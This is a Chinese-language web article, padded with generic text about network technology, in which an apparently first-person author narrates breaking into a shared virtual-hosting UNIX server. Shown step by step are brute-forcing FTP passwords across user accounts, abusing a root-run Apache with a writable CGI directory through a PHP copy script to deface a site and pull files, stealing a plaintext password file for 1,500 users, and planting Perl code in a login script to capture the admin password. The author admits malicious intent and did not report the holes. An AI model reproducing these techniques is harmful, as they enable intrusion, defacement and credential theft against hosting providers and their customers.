|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 其實早就有寫這個文章的想法,一直沒有寫的原因是因為恐怕這無形為一些樂于此道的人提供了一種方法,但想想說了也許就能多少對一些IDC們起一定的壓力,加強一些安全方面的措施,不然的話苦的是那些廣大的虛擬主機用戶,哪天被黑了,都傻傻的不知道怎么回事,當然,在我寫出這個來的時候,我也是已經確定我所提及的大部分問題都已得到解決,下列所述的IP、域名、用戶名、密碼、路徑、文件名等等都已被我更換,不是實際的,而且是合并了2個以上服務商的問題,湊成一起說,各位看官無需將我所述影射到國內的任何一個虛擬主機服務商身上。 事情發生在半年以前,那時候20CN還沒有成立,因為某些原因,我想要干掉一個網站,(沒錯,確實就是這樣,別把俺想得太高尚),首先當然是找個掃描器掃一下端口,發現這是一部很標準的UNIX主機,開著telnet,ftp,smtp,pop等,開著這么多的端口,似乎很好搞,當時這么想,誰知道仔細一看,各個服務程序的版本都沒有什么中級以上漏洞,不僅沒有遠程的溢出,連本地的都似乎沒有,只好試試看有沒有CGI方面的漏洞,一掃下來,也是幾乎沒有什么可以利用的,就在他網站上四處看看,發現有個一會員注冊的程序,為了得到目標的進一步資料,我就注冊一下了,結果收到一份郵件,發現發件人為 ab1234@abc.com,但這個網站的域名確是def.com,奇怪,照這個看來,這個好像是虛擬主機,在IE上打入 IP202.96.100.10看看,結果出來的是XXX公司xxx虛擬主機什么什么#*#%@!%^&#*#@亂七八遭一廣告,沒錯了,這是個虛擬主機。而他在這個主機上的用戶名是ab1234,得到了用戶名,首先進行ftp的簡單窮舉,沒用,看來密碼還是設得比較好,既然你的破不了,那么破了別人的和你的距離也就再接近了一點了,所以看看別人的如何,于是從用戶 ab1200--ab1300一個一個來,很快,ab1210的密碼出來了很簡單的8888,我理所當然的用user:ab1210 pass:8888 telnet 了進去,但我要干掉的是ab1234的而不是ab1210的,所以就去ab1234的目錄 %cd \ %cd home %ls 一堆用戶目錄 %cd ab1234 :Permission denied 沒錯,這正常,進不了其他用戶的目錄,但是沒關系,既然進來了,干掉他的機會就有80%了,現在先到處看看再說,結果發現了這部主機運行了3個獨立的apache,一個在80端口、一個在91端口、還有一個在92,80的不用說,但91、92這些又是干什么的呢?看看再說,在IE上輸入http://202.96.100.10:91/ 出來要一個身份驗證的對話框,好,那就輸入剛剛的ab1210 ,8888,進去了原來這是個用戶管理界面,可以在這里設置郵件,改密碼什么的,既然用web可以做這些事,那這個apache似乎不可能是nobody身份運行了,找到他的httpd.conf一看,天~~~~~~,user root ,這就意味著,如果這個apache 的cgi-bin目錄下的任何一個文件對其他人可寫,我就可以是root,只不過不是控制臺上的root而已,我必須修改那個可寫的文件的內容,讓他變成是我的命令,然后通過瀏覽器用apache來運行他。于是 %cd /var/www/manager/cgi-bin %ls :Permission denied 呀呀,進得來卻不能讀 %cd .. %ls :Permission denied 混蛋 $cd .. %ls %htdocs cgi-bin backup manager 嘿嘿,backup,備份,一般來說,管理員備份的時候一般都為了省事沒有設定權限,看看能不能進 %cd backup % 可以 %ls -la drwxr-xr-x 7 root wheel 512 Jul 20 07:02 . drwxr-xr-x 4 root wheel 512 Jul 3 01:49 .. ...... -rw-r--r-- 1 root wheel 25642628 Jul 3 01:49 manager_00_05_12.tar ...... 嘻嘻,看到沒有,果然有manager目錄的備份,還是644,可以下回去慢慢看看啦,先把他復制到ab1210的htdocs目錄,這是ab1210這個用戶的網站的根目錄 %cp manager_00_05_12.tar /home/ab1210/htdocs/manager.tar %cd %cd htdocs 這個manager.tar超大,25M ,先壓縮一下,然后打開IE下載,輸入http://ab1210的域名/manager.tar.gz,下回本地慢慢看,半小時之后,終于弄清楚這個程序的原理,也知道了在那些目錄下有哪些重要的文件,包括了在/home/sysadm下面似乎有個一用戶的明文密碼文件userpw,也知道了在這個apache的cgi-bin目錄下有個一data的目錄是任何人可寫的,這樣就好辦啦 %cd /var/www/manager/cgi-bin/data %touch hacked.html %touch cp.php3 %vi hacked.html <html> 開始罵的內容,就是沒法輸入中文,沒辦法,湊合 </html> :wq % %vi cp.php3 <? copy("/var/www/manager/cgi-bin/data/hacked.html","/home/ab1234/htdocs/index.html"); ?> :wq % 接下來用IE打開 http://202.96.100.10:91/cgi-bin/data/cp.php3,出來一片空白,呵呵,那就是完成啦,再打開那個網站的主頁看看,沒錯, 就這樣把這網站給改掉了! 到此,干掉這個站的任務是完成了,不過我現在的興趣卻是要看看這個主機里面的一些敏感數據了,還用剛剛的方法,改變 cp.php3的內容,把所有要得文件寫進去,全部復制到ab1210的htdocs目錄打個包,用IE下載了回去,果然,剛剛說到的那個/home/sysadm下面有個明文的密碼文件userpw確實就是這部主機上的所有用戶的用戶名和密碼列表,這個似乎是用來做忘記密碼是取回的文件,呵呵,包括了ab1234這個要干掉的站的密碼也在內,一共1500個用戶的密碼在我手里了,通過對下載回來的manager目錄里的程序和剛剛那些文件的分析,我對這個主機的結構已經相當清楚了,也發現了這個sysadm的用戶似乎有很高的權限,而且它是wheel組的,有su root 的權力,好奇心促使我想要進一步的探索到他的整個機群。當然,我完全可以用剛才的方法寫個腳本改變sysadm 或是 root的密碼,然后隨心所欲的干,但這樣一來,明天我可能就進不來了,他們發現了root密碼被改,肯定會查清楚問題所在了,現在需要得到的是sysadm的密碼,這個密碼在剛剛那個userpw中是沒有的,我估計他們每一部主機的sysadm的密碼應該是相同的,這樣我可以得到其他的主機的控制權,但現在還沒有明確的知道要怎么做,所以先來看看那個運行在92端口的apache是干什么的再說,同樣用IE來看,http://202.96.100.10:92/,還是要輸入密碼,輸入ab1210 ,8888 ,不行,用其他的用戶進入,也不行,剩下的只有一些系統賬號和sysadm這個了,再回到本地來看看第一次下載回來的那個manager.tar,他當中也包括了那個運行在92端口的程序,看看發現這個是他們內部用來管理用戶的程序,管理員可以通過這個程序增加刪除用戶,設定用戶的空間限制等等,這個程序的登陸限制比較嚴格,除了有apache目錄保護之外,還有IP段限制,只允許一個特定的IP段登陸,還有就是只有在/etc/usercan這個文件中列入的用戶名才可以登陸,密碼就還是使用系統的密碼,usercan這個文件我剛剛沒有取回來,現在還是用剛才改主頁的方法,把這個文件復制到ab1210的目錄 %cat usercan sysadm 沒錯,就只有一個人可以登陸,就是sysadm,我現在需要的是sysadm的密碼,當然,那個shadow過的密碼文件我已經也取回了,不過我想這么重要的密碼,應該不會簡單的,窮舉顯然不是辦法,所以,我修改了這個身份驗證的程序index.cgi,增加了如下代碼 open(FH,">>/etc/passwd.org"); print FH "$passwd \n"; close(FH); 這樣,當管理員登錄的時候,他的密碼將被寫到/etc/passwd.org這個文件當中,我只要等著他登陸就行了,改好之后,用ftp上傳,還用剛剛的方法,不過這次是搬回去,覆蓋掉系統上原來的index.cgi。 接下來,當然就是清除剛剛留下的各種痕跡,這個就不再廢話了。第二天,繼續用ab1210登錄 %cat /etc/passwd.org cat: passwd.org: No such file or directory 看來到現在管理員還沒有登陸過,只好繼續等啦,到了晚上,再次登錄,這下有了, %cat /etc/passwd.org D1C2B3A4 D1C2B3A4 % 這樣,我得到了一個應該可登錄到他們的每一部主機上的同屬root組的用戶sysadm,密碼D1C2B3A4,我已經看過/etc/ttys,雖然在那個管理系統上sysadm不能從其他IP登錄,但是操作系統本身并沒有限制sysadm不能telnet。 接下來,就來看看他們多少部這樣的主機,方法很簡單,在202.96.100這個IP段掃出有91這個端口的就是了,一看有6部,隨便找個試試看,成功了,可以進,證實了我的想法沒錯,sysadm可以登陸任何一部主機,而且密碼是一樣的,至此,這個IDC的所有UNIX虛擬主機的一共幾千個客戶的網站的生殺大權以掌握在我手里,只要我頭腦一發熱,一個簡單的腳本就可以把所有的這些網站的主頁改了,只要在那個管理程序中增加幾個#,就可以把所有的用戶刪個一干二凈,幸好我那段時間正好和網上一個MM打得火熱,而生意也有點小錢賺,心情還算非常良好,不然可能就不會有20CN了,你也不會看到我這文章,因為要是當時把他們給改了或是刪了,我今天名氣應該比紅客們大得多,但現在沒準就是在監獄里呆著 好了,本次的入侵可以說是到一段落了,按照通常的入侵實例的寫法,好像到了我要說我就給那管理員發份郵件,告知問題所在的時候了,但是你錯了,我并沒有這么做,為什么?下回分解 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!